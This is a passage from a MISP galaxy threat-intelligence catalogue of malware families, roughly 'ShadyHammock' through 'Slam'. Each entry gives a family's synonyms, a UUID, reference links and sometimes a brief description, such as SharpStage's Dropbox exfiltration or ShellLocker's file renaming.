- https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2 - webarchive
- https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/slides/Slides-Possible-supply-chain-attack-targeting-South-Asian-government-delivers-Shadowpad.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor - webarchive
- https://www.youtube.com/watch?v=55kaaMGBARM - webarchive
- https://www.secureworks.com/research/shadowpad-malware-analysis - webarchive
- https://www.recordedfuture.com/redecho-targeting-indian-power-sector/ - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
- https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ - webarchive
- https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks - webarchive
- https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ - webarchive
- https://www.youtube.com/watch?v=qk9XLDBLPXg - webarchive
- https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ - webarchive
- https://vms.drweb.com/virus/?i=21995048 - webarchive
- https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html - webarchive
- https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf - webarchive
- https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ShadyHammock
Internal MISP references
UUID 5df8173a-8c36-422e-b3f2-7df6503808a7
which can be used as unique global reference for ShadyHammock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shakti
Internal MISP references
UUID f64683c8-50ab-42c0-8b90-881598906528
which can be used as unique global reference for Shakti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SHAPESHIFT
Internal MISP references
UUID 15dd8386-f11a-485a-b719-440c0a47dee6
which can be used as unique global reference for SHAPESHIFT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
shareip
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular shareip.
Known Synonyms |
---|
remotecmd |
Internal MISP references
UUID 6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e
which can be used as unique global reference for shareip
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shark
Internal MISP references
UUID d00c8f94-d6b5-40b7-b167-fc546c5dec38
which can be used as unique global reference for Shark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SharpBeacon
.NET reimplementation of Cobalt Strike beacon/stager
Internal MISP references
UUID 12c0e80c-c439-4eaf-9272-f78b16010313
which can be used as unique global reference for SharpBeacon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SHARPKNOT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SHARPKNOT.
Known Synonyms |
---|
Bitrep |
Internal MISP references
UUID d31f1c73-d14b-41e2-bb16-81ee1d886e43
which can be used as unique global reference for SHARPKNOT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SharpMapExec
This tool is made to simplify penetration testing of networks and to provide a Swiss-army knife that runs on Windows, which is often a requirement during insider threat simulation engagements.
Internal MISP references
UUID e9940cca-6e3a-45e2-88b7-8fa9ae19c647
which can be used as unique global reference for SharpMapExec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SharpStage
The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called "Stage_One". SharpStage can take screenshots, run arbitrary commands and download additional payloads. It exfiltrates data from the infected machine to a Dropbox account by implementing a Dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the Middle East.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SharpStage.
Known Synonyms |
---|
LastConn |
Internal MISP references
UUID 11788d9b-485b-4049-ba5e-1b06d526361e
which can be used as unique global reference for SharpStage
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SHARPSTATS
Internal MISP references
UUID 819fd946-ed0e-4cec-ad45-66b88e39b732
which can be used as unique global reference for SHARPSTATS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SHATTEREDGLASS
Kaspersky Labs observed Andariel dropping this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SHATTEREDGLASS.
Known Synonyms |
---|
Unidentified 081 |
Internal MISP references
UUID 2eb8ca65-186b-44ae-bd91-189b3eb5ed54
which can be used as unique global reference for SHATTEREDGLASS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shatteredglass - webarchive
- https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ - webarchive
- https://github.com/Hildaboo/Unidentified081Server - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ShellClient RAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ShellClient RAT.
Known Synonyms |
---|
GhostShell |
Internal MISP references
UUID f91adcf2-10ce-4ea3-bfae-ea6e270d56f0
which can be used as unique global reference for ShellClient RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shellclient - webarchive
- https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/ - webarchive
- https://www.cybereason.com/blog/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ShellLocker
PCRisk states that ShellLocker is a ransomware-type virus developed using the .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.
Following infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the "[random_characters].L0cked" pattern (e.g., "sample.jpg" might be renamed to "gd&=AA0fgoi.L0cked"). Following successful encryption, ShellLocker opens a pop-up window containing a ransom-demand message.
Internal MISP references
UUID af35e295-7087-4f6c-9f70-a431bf223822
which can be used as unique global reference for ShellLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shifu
Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.
Internal MISP references
UUID 6e668c0c-7085-4951-87d4-0334b6a5cdb3
which can be used as unique global reference for Shifu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu - webarchive
- https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/ - webarchive
- https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shim RAT
Internal MISP references
UUID 67fc358f-da6a-4f01-be23-44bc97319127
which can be used as unique global reference for Shim RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SHIPSHAPE
SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.
Internal MISP references
UUID 07470989-faac-44fb-b505-1d5568b3c716
which can be used as unique global reference for SHIPSHAPE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shujin
Internal MISP references
UUID 77c20bd9-5403-4f99-bae5-c54f3f38a6b6
which can be used as unique global reference for Shujin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shurk Steal
Internal MISP references
UUID 0a8f367d-b63f-4424-bd63-bb6a69d31b63
which can be used as unique global reference for Shurk Steal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shurl0ckr
Internal MISP references
UUID f544ee0e-26f4-48e7-aaee-056f4d1ced82
which can be used as unique global reference for Shurl0ckr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shylock
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Shylock.
Known Synonyms |
---|
Caphaw |
Internal MISP references
UUID 515ee69a-298a-4fcf-bdb0-c5fc6d41872f
which can be used as unique global reference for Shylock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock - webarchive
- https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html - webarchive
- https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis - webarchive
- https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/ - webarchive
- https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware - webarchive
- https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/ - webarchive
- https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/ - webarchive
- https://www.welivesecurity.com/2013/02/25/caphaw-attacking-major-european-banks-with-webinject-plugin/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SideTwist
Internal MISP references
UUID 3275503c-1f0a-4f6c-b13b-ec4ca2b29786
which can be used as unique global reference for SideTwist
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SideWalk (Windows)
Shellcode-based malware family that, according to ESET Research, was likely written by the same authors as win.crosswalk.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SideWalk (Windows).
Known Synonyms |
---|
ScrambleCross |
Internal MISP references
UUID 497d1e0f-dd0c-4462-b3e2-fb4a22f8333f
which can be used as unique global reference for SideWalk (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk - webarchive
- https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/ - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/earth-baku-returns - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SideWinder (Windows)
Internal MISP references
UUID 3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8
which can be used as unique global reference for SideWinder (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder - webarchive
- https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html - webarchive
- https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/ - webarchive
- https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf - webarchive
- https://s.tencent.com/research/report/479.html - webarchive
- https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/ - webarchive
- https://s.tencent.com/research/report/659.html - webarchive
- https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c - webarchive
- https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c - webarchive
- https://www.secrss.com/articles/26507 - webarchive
- https://www.embeeresearch.io/advanced-guide-to-infrastructure-analysis-tracking-apt-sidewinder-domains/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SiennaBlue
Ransomware used by threat actor group DEV-0530, attributed by MSTIC to North Korean origin.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SiennaBlue.
Known Synonyms |
---|
H0lyGh0st |
HolyLocker |
Internal MISP references
UUID 607ba366-85fa-406f-adef-6ea7b437b39c
which can be used as unique global reference for SiennaBlue
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_blue - webarchive
- https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware - webarchive
- https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SiennaPurple
Ransomware used by threat actor group DEV-0530, attributed by MSTIC to North Korean origin.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SiennaPurple.
Known Synonyms |
---|
H0lyGh0st |
HolyLocker |
Internal MISP references
UUID 5ae172d0-5742-4c4b-8847-2efaf9dfb121
which can be used as unique global reference for SiennaPurple
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple - webarchive
- https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware - webarchive
- https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sierra(Alfa,Bravo, ...)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sierra(Alfa,Bravo, ...).
Known Synonyms |
---|
Destover |
Internal MISP references
UUID da92c927-9b31-48aa-854a-8ed49a29565b
which can be used as unique global reference for Sierra(Alfa,Bravo, ...)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras - webarchive
- https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4 - webarchive
- https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware - webarchive
- https://www.us-cert.gov/ncas/alerts/TA14-353A - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SiestaGraph
Internal MISP references
UUID a4f4464a-a8d6-4244-af0a-4a8163ab9f47
which can be used as unique global reference for SiestaGraph
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.siesta_graph - webarchive
- https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry - webarchive
- https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns - webarchive
- https://x.com/threatintel/status/1701259256199090217 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Siggen6
Internal MISP references
UUID c12b3e30-32bf-4b7e-98f6-6a00e95553f8
which can be used as unique global reference for Siggen6
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SigLoader
Internal MISP references
UUID 48bf4991-4743-404a-aac1-72855b30e225
which can be used as unique global reference for SigLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sihost
Internal MISP references
UUID c1b6e597-17e6-4485-819e-5aa03904bc61
which can be used as unique global reference for sihost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Silence
According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).
There is significant variation in Truebot's infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silence.
Known Synonyms |
---|
TrueBot |
Internal MISP references
UUID 0df52c23-690b-4703-83f7-5befc38ab376
which can be used as unique global reference for Silence
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.silence - webarchive
- https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ - webarchive
- https://securelist.com/the-silence/83009/ - webarchive
- https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html - webarchive
- https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html - webarchive
- https://github.com/Tera0017/TAFOF-Unpacker - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://norfolkinfosec.com/some-notes-on-the-silence-proxy/ - webarchive
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://malware.love/malware_analysis/reverse_engineering/config_extraction/2023/07/13/truebot-config-extractor.html - webarchive
- https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/ - webarchive
- https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html - webarchive
- https://reaqta.com/2019/01/silence-group-targeting-russian-banks/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a - webarchive
- https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf - webarchive
- https://www.group-ib.com/resources/threat-research/silence.html - webarchive
- http://www.intezer.com/silenceofthemoles/ - webarchive
- https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere - webarchive
- https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf - webarchive
- https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SilentGh0st
Internal MISP references
UUID 49a06512-fc83-4fc5-b58d-59e0d4005055
which can be used as unique global reference for SilentGh0st
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SILENTUPLOADER
According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.
Internal MISP references
UUID 3ed237f1-35b9-4e74-a37e-966bf023d136
which can be used as unique global reference for SILENTUPLOADER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Silon
Internal MISP references
UUID b602edb3-81c2-4772-b5f8-73deb85cb40a
which can be used as unique global reference for Silon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Siluhdur
Internal MISP references
UUID 774fcb67-1eeb-4bda-9b36-b624b632417a
which can be used as unique global reference for Siluhdur
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Simda
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Simda.
Known Synonyms |
---|
iBank |
Internal MISP references
UUID 467ee29c-317f-481a-a77c-69961eb88c4d
which can be used as unique global reference for Simda
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.simda - webarchive
- https://estr3llas.github.io/unveiling-custom-packers-a-comprehensive-guide/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.youtube.com/watch?v=u2HEGDzd8KM - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://secrary.com/ReversingMalware/iBank/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SimpleFileMover
Internal MISP references
UUID b56173a1-84e3-4551-ac4a-9e71e65dc9e5
which can be used as unique global reference for SimpleFileMover
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sinowal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sinowal.
Known Synonyms |
---|
Anserin |
Mebroot |
Quarian |
Theola |
Torpig |
Internal MISP references
UUID ad5bcaef-1a86-4cc7-8f2e-32306b995018
which can be used as unique global reference for Sinowal
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.recordedfuture.com/turla-apt-infrastructure/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://en.wikipedia.org/wiki/Torpig - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2 - webarchive
- https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sisfader
Internal MISP references
UUID 0fba78fc-47a1-45e1-b5df-71bcabd23b5d
which can be used as unique global reference for Sisfader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader - webarchive
- https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4 - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Skimer
Internal MISP references
UUID 6d5e558a-e640-49c3-87b9-2c102c334b1b
which can be used as unique global reference for Skimer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer - webarchive
- http://atm.cybercrime-tracker.net/index.php - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SkinnyBoy
Internal MISP references
UUID fce8d9c9-7d83-4221-b726-5c49ea271109
which can be used as unique global reference for SkinnyBoy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
skip-2.0
A Microsoft SQL Server backdoor
Internal MISP references
UUID 6a59a639-8070-4c5f-86be-8a2a081cf487
which can be used as unique global reference for skip-2.0
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Skipper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Skipper.
Known Synonyms |
---|
Kotel |
Internal MISP references
UUID fac6313b-8068-429c-93ae-21e8072cf667
which can be used as unique global reference for Skipper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/ - webarchive
- https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/ - webarchive
- https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Skyplex
Internal MISP references
UUID 39002a0d-99aa-4568-b110-48f6df1759cd
which can be used as unique global reference for Skyplex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Slam
Ransomware.
Internal MISP references
UUID 400e437d-13b3-44d9-8f75-34f5e82d6c88
which can be used as unique global reference for Slam
